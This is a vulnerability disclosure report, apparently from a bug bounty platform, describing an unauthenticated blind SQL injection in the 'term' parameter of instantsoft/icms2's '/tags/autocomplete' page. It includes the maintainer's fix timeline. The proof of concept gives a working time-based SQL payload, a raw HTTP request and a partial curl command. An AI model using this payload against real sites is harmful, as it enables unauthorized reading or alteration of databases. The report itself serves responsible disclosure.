Unauthenticated Blind SQL Injection in '/tags/autocomplete' in instantsoft/icms2


Reported on

Aug 2nd 2023


The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete page.
The GET parameter term does not sufficiently sanitize input.

Proof of Concept

  1. Make a GET request to http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' and observe that the server responds to the time delay.
GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
Host: icms.local
X-Requested-With: XMLHttpRequest
  1. Replace hostname below where necessary
curl -i -s -k -X $'GET' \
    -H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
  1. As long as X-Requested-With: XMLHttpRequest is in the HTTP request headers, an unauthenticated attacker can make the request directly to inject into the affected parameter.

Remedial Action

It is recommended to sanitize the affected parameter term.


Unauthenticated users are able to dump or alter data from the database via the affected page and parameter.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 4 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 4 months ago
instantsoft/icms2 maintainer
4 months ago


Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f

instantsoft/icms2 maintainer modified the Severity from Critical (9.8) to Critical (9.8) 4 months ago
instantsoft/icms2 maintainer validated this vulnerability 4 months ago
legpains has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
autocomplete.php#L21 has been validated
instantsoft/icms2 maintainer published this vulnerability 4 months ago
instantsoft/icms2 maintainer gave praise 4 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
instantsoft/icms2 maintainer
4 months ago


If I've done something wrong in this topic, please post. First time here.

to join this conversation